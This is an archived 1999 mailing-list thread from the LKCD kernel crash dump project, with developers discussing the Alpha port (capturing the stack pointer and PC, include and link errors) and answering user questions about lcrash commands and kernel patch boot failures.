Brian Hall From: Brian Hall To: Matt Robinson , x-linux-kernel@vger.rutgers.edu, comp.os.linux.alpha@list.deja.com Subject: Retrieving PC from (traversing) the stack on Alpha Cc: lkcd@oss.sgi.com Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing Okay, after some research, I think I figured out how to get at the needed Alpha registers: register unsigned long fptr __asm__("$15"); /* get frame pointer? */ register unsigned long sptr __asm__("$30"); /* get stack pointer? */ Now, my understanding of the problem is that I need to go back two frames on the stack to get the PC of interest, and three for the RA of interest. How do I do this? I haven't had much luck yet trying to figure out how to navigate the kernel stack. I see the pt_regs structure, but I'm not exactly sure how to figure the frame size, since that can vary with each frame. On 13-Dec-1999 Matt Robinson wrote: > The problem is from panic(), you don't have the registers, so you > need to grab them. That way the 'lcrash' code has a point to start > with as far as the failing process is concerned. Hence the "if (regs)" > stuff. -- Brian Hall Linux Consultant From owner-lkcd@oss.sgi.com Thu Dec 16 20:05:19 1999 Received: by oss.sgi.com id ; Thu, 16 Dec 1999 20:05:10 -0800 Received: from fes-qout.whowhere.com ([209.1.236.7]:15332 "HELO mailcity.com") by oss.sgi.com with SMTP id ; Thu, 16 Dec 1999 20:04:58 -0800 Received: from Unknown/Local ([?.?.?.?]) by mailcity.com; Thu Dec 16 20:02:27 1999 To: lkcd@oss.sgi.com Date: Thu, 16 Dec 1999 20:02:27 -0800 From: "Guru raj" Message-ID: Mime-Version: 1.0 X-Sent-Mail: on Reply-To: gurur@mailcity.com X-Expiredinmiddle: true X-Mailer: MailCity Service Subject: SGI Linux 1.1 Kernel Patch X-Sender-Ip: 203.141.89.173 Organization: MailCity (http://www.mailcity.lycos.com:80) Content-Type: text/plain; charset=us-ascii Content-Language: en Content-Length: 608 Content-Transfer-Encoding: 7bit Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing I have RH6.1. I downloaded linux-2.2.10 from www.kernel.org. and the SGI kernel patch from oss.sgi.com/projects/sgilinux1.1. After applying the patch I compiled the kernel and created a new kernel image. When I tried to boot into this new kernel,after loading and uncompressing the kernel, it gives the following message 'unable to handle kernel paging request at ox______' It dumps the values of registers and enters in to kernel debugging mode and stops at debugging prompt. What might be the problem. LYCOShop is now open. On your mark, get set, SHOP!!! http://shop.lycos.com/ From owner-lkcd@oss.sgi.com Thu Dec 16 22:09:10 1999 Received: by oss.sgi.com id ; Thu, 16 Dec 1999 22:09:01 -0800 Received: from pneumatic-tube.sgi.com ([204.94.214.22]:47485 "EHLO pneumatic-tube.sgi.com") by oss.sgi.com with ESMTP id ; Thu, 16 Dec 1999 22:08:49 -0800 Received: from awesome.engr.sgi.com (awesome.engr.sgi.com [150.166.49.119]) by pneumatic-tube.sgi.com (980327.SGI.8.8.8-aspam/980310.SGI-aspam) via ESMTP id WAA04895 for ; Thu, 16 Dec 1999 22:09:45 -0800 (PST) mail_from (yakker@cthulhu.engr.sgi.com) Received: from localhost (yakker@localhost) by awesome.engr.sgi.com (980427.SGI.8.8.8/970903.SGI.AUTOCF) via SMTP id WAA45400; Thu, 16 Dec 1999 22:06:40 -0800 (PST) Date: Thu, 16 Dec 1999 22:06:39 -0800 (PST) From: Matt Robinson To: Guru raj cc: lkcd@oss.sgi.com Subject: Re: SGI Linux 1.1 Kernel Patch In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing On Thu, 16 Dec 1999, Guru raj wrote: |>I have RH6.1. |> |>I downloaded linux-2.2.10 from www.kernel.org. |>and the SGI kernel patch from oss.sgi.com/projects/sgilinux1.1. |> |>After applying the patch I compiled the kernel and created a new kernel image. |> |>When I tried to boot into this new kernel,after loading and uncompressing the kernel, it gives the following message |> |>'unable to handle kernel paging request at ox______' |> |>It dumps the values of registers and enters in to kernel debugging mode and stops at debugging |>prompt. If you're in KDB, what was 'bt' say? Do you have a screen dump of the Oops information? If you crashed on the way up, it may be long before the crash dumping is configured properly in the kernel. |>What might be the problem. |> |>LYCOShop is now open. On your mark, get set, SHOP!!! |>http://shop.lycos.com/ I'm forwarding this to one of SGI's internal lists to see if we've heard of anything like this. If you could let us know what hardware configuration you're running with, including all PCI/ISA cards, number of CPUs, memory configuration/layout/vendor, processor type and speed, etc., perhaps we can make further progress. Also, did your 2.2.10 kernel build and run properly without SGILE 1.1? Thanks, let us know what we can do. --Matt From owner-lkcd@oss.sgi.com Mon Dec 20 02:05:08 1999 Received: by oss.sgi.com id ; Mon, 20 Dec 1999 02:04:49 -0800 Received: from fes-qout.whowhere.com ([209.1.236.7]:18862 "HELO mailcity.com") by oss.sgi.com with SMTP id ; Mon, 20 Dec 1999 02:04:30 -0800 Received: from Unknown/Local ([?.?.?.?]) by mailcity.com; Mon Dec 20 02:02:42 1999 To: "Matt Robinson" Date: Mon, 20 Dec 1999 02:02:42 -0800 From: "Ashish Arora" Message-ID: Mime-Version: 1.0 Cc: lkcd@oss.sgi.com X-Sent-Mail: off Reply-To: ashisharora@mailcity.com X-Mailer: MailCity Service Subject: Patch applied successfully But... X-Sender-Ip: 192.35.232.13 Organization: MailCity (http://www.mailcity.lycos.com:80) Content-Type: text/plain; charset=us-ascii Content-Language: en Content-Length: 642 Content-Transfer-Encoding: 7bit Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing Dear Matt, i applied the patch successfully and am facing no problems working with it. It is working fine when a system panic occurs(when i call the panic function), i am able to get the trace and the report. Can u tell me what happens when the system crashes. First of all i would like to know how can i make my system to crash and then what happens when system crashes, does it call the panic function when it crashes. And also what happens when the system hangs, is there any facility related for that to see the report why the system hung. --Ashish LYCOShop is now open. On your mark, get set, SHOP!!! http://shop.lycos.com/ From owner-lkcd@oss.sgi.com Mon Dec 20 23:52:35 1999 Received: by oss.sgi.com id ; Mon, 20 Dec 1999 23:52:26 -0800 Received: from fes-qout.whowhere.com ([209.1.236.7]:35266 "HELO mailcity.com") by oss.sgi.com with SMTP id ; Mon, 20 Dec 1999 23:52:13 -0800 Received: from Unknown/Local ([?.?.?.?]) by mailcity.com; Mon Dec 20 23:50:27 1999 To: "Matt Robinson" Date: Mon, 20 Dec 1999 23:50:27 -0800 From: "Ashish Arora" Message-ID: Mime-Version: 1.0 Cc: lkcd@oss.sgi.com X-Sent-Mail: off Reply-To: ashisharora@mailcity.com X-Mailer: MailCity Service Subject: Problem in using lcrash commands X-Sender-Ip: 192.35.232.13 Organization: MailCity (http://www.mailcity.lycos.com:80) Content-Type: text/plain; charset=us-ascii Content-Language: en Content-Length: 1333 Content-Transfer-Encoding: 7bit Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing Dear Matt, i am using the commands with the lcrash. In this i am unable to find the proper usage for the commands. Whenever i type a command in lcrash, it gives a message saying that the usage for the command is wrong. Can u tell me where can i get to know about the proper usage for all those commands. I have already gone through the help provided for each command but i am still unable to overcome that problem. Also when i used the whatis command with -s option it gave a segmentation fault error and quitted from lcrash. --Ashish -- On Tue, 14 Dec 1999 23:17:45 Matt Robinson wrote: >Ashish, have you read the FAQ? > > http://oss.sgi.com/projects/lkcd/faq.html#2.3 > >This should have answered your question. > >--Matt > >On Wed, 15 Dec 1999, Keith Owens wrote: >|>On Tue, 14 Dec 1999 22:27:17 -0800, >|>"Ashish Arora" wrote: >|>> I applied the patch for the lkcd 1.0.3. to the linux kernel version 2.2.12 but i faced the problem that it was not able to find the declarations of AS_KERNEL, AS_USER, AS_REMOTE etc. I am attaching the file for reference. >|> >|>You have to apply the raw I/O patch (sgi+straw2.2.13.patch) *before* >|>the lkcd patch. >|> > > LYCOShop is now open. On your mark, get set, SHOP!!! http://shop.lycos.com/ From owner-lkcd@oss.sgi.com Tue Dec 21 09:03:01 1999 Received: by oss.sgi.com id ; Tue, 21 Dec 1999 09:02:51 -0800 Received: from sgi.SGI.COM ([192.48.153.1]:13368 "EHLO sgi.com") by oss.sgi.com with ESMTP id ; Tue, 21 Dec 1999 09:02:32 -0800 Received: from loco.csd.sgi.com ([150.166.1.62]) by sgi.com (980327.SGI.8.8.8-aspam/980304.SGI-aspam: SGI does not authorize the use of its proprietary systems or networks for unsolicited or bulk email from the Internet.) via ESMTP id JAA07248 for ; Tue, 21 Dec 1999 09:01:50 -0800 (PST) mail_from (tjm@sgi.com) Received: from sgi.com (localhost.csd.sgi.com [127.0.0.1]) by loco.csd.sgi.com (980427.SGI.8.8.8/970903.SGI.AUTOCF) via ESMTP id JAA15836; Tue, 21 Dec 1999 09:00:17 -0800 (PST) Message-ID: <385FB21F.1C78E7C9@sgi.com> Date: Tue, 21 Dec 1999 09:00:15 -0800 From: Tom Morano X-Mailer: Mozilla 4.61C-SGI [en] (X11; I; IRIX 6.5 IP22) X-Accept-Language: en MIME-Version: 1.0 To: ashisharora@mailcity.com CC: Matt Robinson , lkcd@oss.sgi.com Subject: Re: Problem in using lcrash commands References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing Ashish Arora wrote: > > Dear Matt, > i am using the commands with the lcrash. In this i am unable to find the proper usage for the commands. Whenever i type a command in lcrash, it gives a message saying that the usage for the command is wrong. Can u tell me where can i get to know about the proper usage for all those commands. I have already gone through the help provided for each command but i am still unable to overcome that problem. It's hard to tell what's going on without an example of what you are trying. Could you please provide such an example? > Also when i used the whatis command with -s option it gave a segmentation fault error and quitted from lcrash. Hi Ashish, I'm not sure what's going on here. The -s flag is not valid for the 'whatis' command. When I tried it, here's what I got... >> whatis -s Illegal comamnd line option: 's' USAGE: whatis [-a] [-f] [-l] [-n] [-w outfile] expression BTW, the whatis command doesn't do anything unless you first load in type information from a namelist file (one is created in the cmd/lcrash/lib/libklib directory). You have to issue a command such as this: >> addtypes namelist Then you can do something like this... >> whatis socket struct socket { socket_state state; long unsigned int flags; struct proto_ops *ops; struct inode *inode; struct fasync_struct *fasync_list; struct file *file; struct sock *sk; struct wait_queue *wait; short int type; unsigned char passcred; unsigned char tli; }; Hope this helps, Tom > --Ashish > > -- > > On Tue, 14 Dec 1999 23:17:45 Matt Robinson wrote: > >Ashish, have you read the FAQ? > > > > http://oss.sgi.com/projects/lkcd/faq.html#2.3 > > > >This should have answered your question. > > > >--Matt > > > >On Wed, 15 Dec 1999, Keith Owens wrote: > >|>On Tue, 14 Dec 1999 22:27:17 -0800, > >|>"Ashish Arora" wrote: > >|>> I applied the patch for the lkcd 1.0.3. to the linux kernel version 2.2.12 but i faced the problem that it was not able to find the declarations of AS_KERNEL, AS_USER, AS_REMOTE etc. I am attaching the file for reference. > >|> > >|>You have to apply the raw I/O patch (sgi+straw2.2.13.patch) *before* > >|>the lkcd patch. > >|> > > > > > > LYCOShop is now open. On your mark, get set, SHOP!!! > http://shop.lycos.com/ From owner-lkcd@oss.sgi.com Tue Dec 21 10:31:01 1999 Received: by oss.sgi.com id ; Tue, 21 Dec 1999 10:30:52 -0800 Received: from pneumatic-tube.sgi.com ([204.94.214.22]:41022 "EHLO pneumatic-tube.sgi.com") by oss.sgi.com with ESMTP id ; Tue, 21 Dec 1999 10:30:30 -0800 Received: from awesome.engr.sgi.com (awesome.engr.sgi.com [150.166.49.119]) by pneumatic-tube.sgi.com (980327.SGI.8.8.8-aspam/980310.SGI-aspam) via ESMTP id KAA08983 for ; Tue, 21 Dec 1999 10:31:54 -0800 (PST) mail_from (yakker@cthulhu.engr.sgi.com) Received: from localhost (yakker@localhost) by awesome.engr.sgi.com (980427.SGI.8.8.8/970903.SGI.AUTOCF) via SMTP id KAA62063; Tue, 21 Dec 1999 10:28:44 -0800 (PST) Date: Tue, 21 Dec 1999 10:28:44 -0800 (PST) From: Matt Robinson Reply-To: Matt Robinson To: Ashish Arora cc: Matt Robinson , lkcd@oss.sgi.com Subject: Re: Patch applied successfully But... In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing Ashish, have you read the FAQ? Read the section "Kernel Crash Dump Process". Most everything you asked is answered there. As for system hangs, we haven't created an NMI (non-maskable interrupt) hook into the hardware to allow people to NMI their systems and get a memory dump (yet). When that's done, we'll let you know. If you have a specific question about how things work, please ask, but if you're looking for an overview, read the FAQ. We put a lot of time in it so we wouldn't have to answer generic questions over and over. Thanks. --Matt On Mon, 20 Dec 1999, Ashish Arora wrote: |>Dear Matt, |> i applied the patch successfully and am facing no problems working with it. It is working fine when a system panic occurs(when i call the panic function), i am able to get the trace and the report. Can u tell me what happens when the system crashe s. First of all i would like to know how can i make my system to crash and then what happens when system crashes, does it call the panic function when it crashes. And also what happens when the system hangs, is there any facility related for that to see t he report why the system hung. |> --Ashish |> |> |>LYCOShop is now open. On your mark, get set, SHOP!!! |>http://shop.lycos.com/ |> From owner-lkcd@oss.sgi.com Tue Dec 21 11:58:10 1999 Received: by oss.sgi.com id ; Tue, 21 Dec 1999 11:58:01 -0800 Received: from zmamail02.zma.compaq.com ([161.114.64.102]:25098 "HELO zmamail02.zma.compaq.com") by oss.sgi.com with SMTP id ; Tue, 21 Dec 1999 11:57:37 -0800 Received: by zmamail02.zma.compaq.com (Postfix, from userid 12345) id 5A904313; Tue, 21 Dec 1999 14:57:03 -0500 (EST) Received: from cxo3ns.cxo.dec.com (cxo3ns.cxo.dec.com [16.63.0.10]) by zmamail02.zma.compaq.com (Postfix) with SMTP id 46A0D12E; Tue, 21 Dec 1999 14:57:02 -0500 (EST) Received: from brownfur.cxo.dec.com by cxo3ns.cxo.dec.com; (5.65v4.0/1.1.8.2/11Apr96-1001AM) id AA05553; Tue, 21 Dec 1999 12:57:01 -0700 Received: from dhcp192-89.cxo.dec.com by brownfur.cxo.dec.com (5.65v4.0/1.1.10.5/17Feb98-0753AM) id AA24464; Tue, 21 Dec 1999 12:57:00 -0700 Received: by compaq.com (sSMTP sendmail emulation); Thu, 23 Dec 1999 12:55:18 -0700 Content-Length: 1324 Message-Id: X-Mailer: XFMail 1.4.4 on Linux X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit Mime-Version: 1.0 In-Reply-To: Date: Thu, 23 Dec 1999 12:55:17 -0700 (MST) Reply-To: Brian Hall From: Brian Hall To: axp-list@redhat.com Subject: RE: Retrieving PC from (traversing) the stack on Alpha Cc: lkcd@oss.sgi.com, comp.os.linux.alpha@list.deja.com, Matt Robinson Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing Well, it's not clear to me how to get the PC and RA of interest off the stack when we are in the vmdump functions. We could retreive the RA from register 26 in the panic() function itself, and pass that to the dump_execute function. Then the dump code could at least tell where panic was called from. Is this sufficient, or at least a start? On 18-Dec-1999 Brian Hall wrote: > Okay, after some research, I think I figured out how to get at the needed > Alpha registers: > > register unsigned long fptr __asm__("$15"); /* get frame pointer? */ > register unsigned long sptr __asm__("$30"); /* get stack pointer? */ > > Now, my understanding of the problem is that I need to go back two frames on > the stack to get the PC of interest, and three for the RA of interest. How do > I > do this? I haven't had much luck yet trying to figure out how to navigate the > kernel stack. I see the pt_regs structure, but I'm not exactly sure how to > figure the frame size, since that can vary with each frame. > > On 13-Dec-1999 Matt Robinson wrote: >> The problem is from panic(), you don't have the registers, so you >> need to grab them. That way the 'lcrash' code has a point to start >> with as far as the failing process is concerned. Hence the "if (regs)" >> stuff. -- Brian Hall Linux Consultant From owner-lkcd@oss.sgi.com Tue Dec 21 12:10:12 1999 Received: by oss.sgi.com id ; Tue, 21 Dec 1999 12:10:02 -0800 Received: from pneumatic-tube.sgi.com ([204.94.214.22]:50002 "EHLO pneumatic-tube.sgi.com") by oss.sgi.com with ESMTP id ; Tue, 21 Dec 1999 12:09:41 -0800 Received: from awesome.engr.sgi.com (awesome.engr.sgi.com [150.166.49.119]) by pneumatic-tube.sgi.com (980327.SGI.8.8.8-aspam/980310.SGI-aspam) via ESMTP id MAA00985 for ; Tue, 21 Dec 1999 12:11:05 -0800 (PST) mail_from (yakker@cthulhu.engr.sgi.com) Received: from localhost (yakker@localhost) by awesome.engr.sgi.com (980427.SGI.8.8.8/970903.SGI.AUTOCF) via SMTP id MAA52341; Tue, 21 Dec 1999 12:07:53 -0800 (PST) Date: Tue, 21 Dec 1999 12:07:52 -0800 (PST) From: Matt Robinson To: Brian Hall cc: axp-list@redhat.com, lkcd@oss.sgi.com, comp.os.linux.alpha@list.deja.com, Matt Robinson Subject: RE: Retrieving PC from (traversing) the stack on Alpha In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing On Thu, 23 Dec 1999, Brian Hall wrote: |>Well, it's not clear to me how to get the PC and RA of interest off the stack |>when we are in the vmdump functions. We could retreive the RA from register 26 |>in the panic() function itself, and pass that to the dump_execute function. |>Then the dump code could at least tell where panic was called from. Is this |>sufficient, or at least a start? In the __dump_execute() function, just save the PC into the right registers, and that'll be enough. You don't have to fill the pt_regs structure. The big keys are the stack pointer and the PC for that process within the __dump_execute() function. Save the stack pointer into dump_header.dh_esp, and the PC into dump_header.dh_eip. That's all 'lcrash' should need in order to figure out the stack trace of the failing process (for now). Having the RA is nice, but not entirely necessary. I should have named dh_esp and dh_eip into something like dh_sp and dh_pc, for simplicity's sake. Next revision ... --Matt |>On 18-Dec-1999 Brian Hall wrote: |>> Okay, after some research, I think I figured out how to get at the needed |>> Alpha registers: |>> |>> register unsigned long fptr __asm__("$15"); /* get frame pointer? */ |>> register unsigned long sptr __asm__("$30"); /* get stack pointer? */ |>> |>> Now, my understanding of the problem is that I need to go back two frames on |>> the stack to get the PC of interest, and three for the RA of interest. How do |>> I |>> do this? I haven't had much luck yet trying to figure out how to navigate the |>> kernel stack. I see the pt_regs structure, but I'm not exactly sure how to |>> figure the frame size, since that can vary with each frame. |>> |>> On 13-Dec-1999 Matt Robinson wrote: |>>> The problem is from panic(), you don't have the registers, so you |>>> need to grab them. That way the 'lcrash' code has a point to start |>>> with as far as the failing process is concerned. Hence the "if (regs)" |>>> stuff. |> |>-- |>Brian Hall |>Linux Consultant From owner-lkcd@oss.sgi.com Tue Dec 21 15:48:56 1999 Received: by oss.sgi.com id ; Tue, 21 Dec 1999 15:48:46 -0800 Received: from zmamail02.zma.compaq.com ([161.114.64.102]:37128 "HELO zmamail02.zma.compaq.com") by oss.sgi.com with SMTP id ; Tue, 21 Dec 1999 15:48:31 -0800 Received: by zmamail02.zma.compaq.com (Postfix, from userid 12345) id 89BF220C; Tue, 21 Dec 1999 18:47:58 -0500 (EST) Received: from cxo3ns.cxo.dec.com (cxo3ns.cxo.dec.com [16.63.0.10]) by zmamail02.zma.compaq.com (Postfix) with SMTP id 7DCD72BF; Tue, 21 Dec 1999 18:47:57 -0500 (EST) Received: from brownfur.cxo.dec.com by cxo3ns.cxo.dec.com; (5.65v4.0/1.1.8.2/11Apr96-1001AM) id AA07051; Tue, 21 Dec 1999 16:47:56 -0700 Received: from dhcp192-89.cxo.dec.com by brownfur.cxo.dec.com (5.65v4.0/1.1.10.5/17Feb98-0753AM) id AA04529; Tue, 21 Dec 1999 16:47:55 -0700 Received: by compaq.com (sSMTP sendmail emulation); Thu, 23 Dec 1999 16:46:17 -0700 Content-Length: 3348 Message-Id: X-Mailer: XFMail 1.4.4 on Linux X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit Mime-Version: 1.0 In-Reply-To: Date: Thu, 23 Dec 1999 16:46:16 -0700 (MST) Reply-To: Brian Hall From: Brian Hall To: Matt Robinson Subject: new problem: can't see vmdump.h? Cc: comp.os.linux.alpha@list.deja.com, lkcd@oss.sgi.com, axp-list@redhat.com Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing OK, I've got the following code in __dump_execute: __dump_execute(struct file *dump_file, char *panic_str, struct pt_regs *regs, int dump_level, int dump_compress_pages) { dump_here: ( some code skipped here) /* For Alpha, save the Program Counter and Stack Pointer */ dump_header.dh_esp = __asm__("$30"); /* get stack pointer */ dump_header.dh_eip = &&dump_here; /* get Program Counter */ Sound OK? I removed the cmd directory temporarily from the top level Makefile so I could do a test build (lots of work todo there!). Had to fix a type in sd.c, but the compile died completely when it reached arch/alpha/kernel/vmdump.c, apparently because it couldn't see vmdump.h. Huh? File does exist as requested in include/linux; adding an include line with the explicit path to it didn't help. Any idea why this fails to see the include? /usr/src/linux is actually symlinked to a mounted NFS share that holds the kernel source; doesn't seem like that would be the problem since the rest of the kernel was building fine. /usr/include/linux points to ../src/linux/include/linux/. On 21-Dec-1999 Matt Robinson wrote: > On Thu, 23 Dec 1999, Brian Hall wrote: >|>Well, it's not clear to me how to get the PC and RA of interest off the >|>stack >|>when we are in the vmdump functions. We could retreive the RA from register >|>26 >|>in the panic() function itself, and pass that to the dump_execute function. >|>Then the dump code could at least tell where panic was called from. Is this >|>sufficient, or at least a start? > > In the __dump_execute() function, just save the PC into the right > registers, and that'll be enough. You don't have to fill the pt_regs > structure. > > The big keys are the stack pointer and the PC for that process within > the __dump_execute() function. Save the stack pointer into > dump_header.dh_esp, and the PC into dump_header.dh_eip. That's all > 'lcrash' should need in order to figure out the stack trace of the > failing process (for now). Having the RA is nice, but not entirely > necessary. > > I should have named dh_esp and dh_eip into something like dh_sp and > dh_pc, for simplicity's sake. Next revision ... > > --Matt > >|>On 18-Dec-1999 Brian Hall wrote: >|>> Okay, after some research, I think I figured out how to get at the needed >|>> Alpha registers: >|>> >|>> register unsigned long fptr __asm__("$15"); /* get frame pointer? */ >|>> register unsigned long sptr __asm__("$30"); /* get stack pointer? */ >|>> >|>> Now, my understanding of the problem is that I need to go back two frames >|>> on >|>> the stack to get the PC of interest, and three for the RA of interest. How >|>> do >|>> I >|>> do this? I haven't had much luck yet trying to figure out how to navigate >|>> the >|>> kernel stack. I see the pt_regs structure, but I'm not exactly sure how to >|>> figure the frame size, since that can vary with each frame. >|>> >|>> On 13-Dec-1999 Matt Robinson wrote: >|>>> The problem is from panic(), you don't have the registers, so you >|>>> need to grab them. That way the 'lcrash' code has a point to start >|>>> with as far as the failing process is concerned. Hence the "if (regs)" >|>>> stuff. >|> >|>-- >|>Brian Hall >|>Linux Consultant -- Brian Hall Linux Consultant From owner-lkcd@oss.sgi.com Tue Dec 21 16:29:47 1999 Received: by oss.sgi.com id ; Tue, 21 Dec 1999 16:29:37 -0800 Received: from pneumatic-tube.sgi.com ([204.94.214.22]:52841 "EHLO pneumatic-tube.sgi.com") by oss.sgi.com with ESMTP id ; Tue, 21 Dec 1999 16:29:26 -0800 Received: from awesome.engr.sgi.com (awesome.engr.sgi.com [150.166.49.119]) by pneumatic-tube.sgi.com (980327.SGI.8.8.8-aspam/980310.SGI-aspam) via ESMTP id QAA06065 for ; Tue, 21 Dec 1999 16:30:51 -0800 (PST) mail_from (yakker@cthulhu.engr.sgi.com) Received: from localhost (yakker@localhost) by awesome.engr.sgi.com (980427.SGI.8.8.8/970903.SGI.AUTOCF) via SMTP id QAA53899; Tue, 21 Dec 1999 16:27:39 -0800 (PST) Date: Tue, 21 Dec 1999 16:27:39 -0800 (PST) From: Matt Robinson To: Brian Hall cc: Matt Robinson , comp.os.linux.alpha@list.deja.com, lkcd@oss.sgi.com, axp-list@redhat.com Subject: Re: new problem: can't see vmdump.h? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing On Thu, 23 Dec 1999, Brian Hall wrote: |>OK, I've got the following code in __dump_execute: |> |>__dump_execute(struct file *dump_file, char *panic_str, |> struct pt_regs *regs, int dump_level, int dump_compress_pages) |>{ |>dump_here: |> |>( some code skipped here) |> |> /* For Alpha, save the Program Counter and Stack Pointer */ |> dump_header.dh_esp = __asm__("$30"); /* get stack pointer */ |> dump_header.dh_eip = &&dump_here; /* get Program Counter */ |> |>Sound OK? That sounds just fine. :) |>I removed the cmd directory temporarily from the top level Makefile so I could |>do a test build (lots of work todo there!). Had to fix a type in sd.c, but the |>compile died completely when it reached arch/alpha/kernel/vmdump.c, apparently |>because it couldn't see vmdump.h. Huh? File does exist as requested in |>include/linux; adding an include line with the explicit path to it didn't help. Do you have: #ifndef CONFIG_VMDUMP #define CONFIG_VMDUMP #include #endif at the top of the file? This might be needed if you're compiling the new vmdump.o, but you don't have CONFIG_VMDUMP set. Just a thought. If that file gets built, it's because CONFIG_VMDUMP is in the object. Look at arch/i386/kernel/Makefile for an example: ifdef CONFIG_VMDUMP O_OBJS += vmdump.o endif |>Any idea why this fails to see the include? /usr/src/linux is actually |>symlinked to a mounted NFS share that holds the kernel source; doesn't seem |>like that would be the problem since the rest of the kernel was building fine. |>/usr/include/linux points to ../src/linux/include/linux/. Let me know what happens ... --Matt |>On 21-Dec-1999 Matt Robinson wrote: |>> On Thu, 23 Dec 1999, Brian Hall wrote: |>>|>Well, it's not clear to me how to get the PC and RA of interest off the |>>|>stack |>>|>when we are in the vmdump functions. We could retreive the RA from register |>>|>26 |>>|>in the panic() function itself, and pass that to the dump_execute function. |>>|>Then the dump code could at least tell where panic was called from. Is this |>>|>sufficient, or at least a start? |>> |>> In the __dump_execute() function, just save the PC into the right |>> registers, and that'll be enough. You don't have to fill the pt_regs |>> structure. |>> |>> The big keys are the stack pointer and the PC for that process within |>> the __dump_execute() function. Save the stack pointer into |>> dump_header.dh_esp, and the PC into dump_header.dh_eip. That's all |>> 'lcrash' should need in order to figure out the stack trace of the |>> failing process (for now). Having the RA is nice, but not entirely |>> necessary. |>> |>> I should have named dh_esp and dh_eip into something like dh_sp and |>> dh_pc, for simplicity's sake. Next revision ... |>> |>> --Matt |>> |>>|>On 18-Dec-1999 Brian Hall wrote: |>>|>> Okay, after some research, I think I figured out how to get at the needed |>>|>> Alpha registers: |>>|>> |>>|>> register unsigned long fptr __asm__("$15"); /* get frame pointer? */ |>>|>> register unsigned long sptr __asm__("$30"); /* get stack pointer? */ |>>|>> |>>|>> Now, my understanding of the problem is that I need to go back two frames |>>|>> on |>>|>> the stack to get the PC of interest, and three for the RA of interest. How |>>|>> do |>>|>> I |>>|>> do this? I haven't had much luck yet trying to figure out how to navigate |>>|>> the |>>|>> kernel stack. I see the pt_regs structure, but I'm not exactly sure how to |>>|>> figure the frame size, since that can vary with each frame. |>>|>> |>>|>> On 13-Dec-1999 Matt Robinson wrote: |>>|>>> The problem is from panic(), you don't have the registers, so you |>>|>>> need to grab them. That way the 'lcrash' code has a point to start |>>|>>> with as far as the failing process is concerned. Hence the "if (regs)" |>>|>>> stuff. |>>|> |>>|>-- |>>|>Brian Hall |>>|>Linux Consultant |> |> |>-- |>Brian Hall |>Linux Consultant |> From owner-lkcd@oss.sgi.com Wed Dec 22 09:33:16 1999 Received: by oss.sgi.com id ; Wed, 22 Dec 1999 09:33:07 -0800 Received: from zmamail01.zma.compaq.com ([161.114.64.101]:22543 "HELO zmamail01.zma.compaq.com") by oss.sgi.com with SMTP id ; Wed, 22 Dec 1999 09:32:52 -0800 Received: by zmamail01.zma.compaq.com (Postfix, from userid 12345) id 5B3CD5BB; Wed, 22 Dec 1999 12:32:23 -0500 (EST) Received: from cxo3ns.cxo.dec.com (cxo3ns.cxo.dec.com [16.63.0.10]) by zmamail01.zma.compaq.com (Postfix) with SMTP id 129764D6; Wed, 22 Dec 1999 12:32:22 -0500 (EST) Received: from brownfur.cxo.dec.com by cxo3ns.cxo.dec.com; (5.65v4.0/1.1.8.2/11Apr96-1001AM) id AA09505; Wed, 22 Dec 1999 10:32:21 -0700 Received: from dhcp192-89.cxo.dec.com by brownfur.cxo.dec.com (5.65v4.0/1.1.10.5/17Feb98-0753AM) id AA13388; Wed, 22 Dec 1999 10:32:20 -0700 Received: by compaq.com (sSMTP sendmail emulation); Fri, 24 Dec 1999 10:30:36 -0700 Content-Length: 13676 Message-Id: X-Mailer: XFMail 1.4.4 on Linux X-Priority: 3 (Normal) Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="_=XFMail.1.4.4.Linux:19991224103036:14377=_" In-Reply-To: Date: Fri, 24 Dec 1999 10:30:36 -0700 (MST) Reply-To: Brian Hall From: Brian Hall To: Matt Robinson Subject: Re: new problem: can't see vmdump.h? Cc: lkcd@oss.sgi.com Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing This message is in MIME format --_=XFMail.1.4.4.Linux:19991224103036:14377=_ Content-Type: text/plain; charset=us-ascii That fixed the vmdump.h problem. Now it actually compiles, with warnings (implied casts). I notice that dh_esp and dh_eip are 32 bits wide; they will need to be 64 bit for Alpha; and the other uint32_t(s) in vmdump.c (__dump_execute) will also need to be uint64_t(s), and the changes propagated, correct? Now, should I go ahead and change dump_header_t to (choose one): 1) make dh_esp,etc uint64_t(s) in the header; 2) add fields specifically for alpha; 3) do #1 and change them to dh_sp and dh_pc while I'm at it? While it will compile, it fails to link because alpha/vmdump.o can't find dump_page_buf. Here are the errors: arch/alpha/kernel/kernel.o: In function `__dump_write_header': vmdump.c(.text+0xb658): undefined reference to `dump_page_buf' arch/alpha/kernel/kernel.o: In function `__dump_execute': 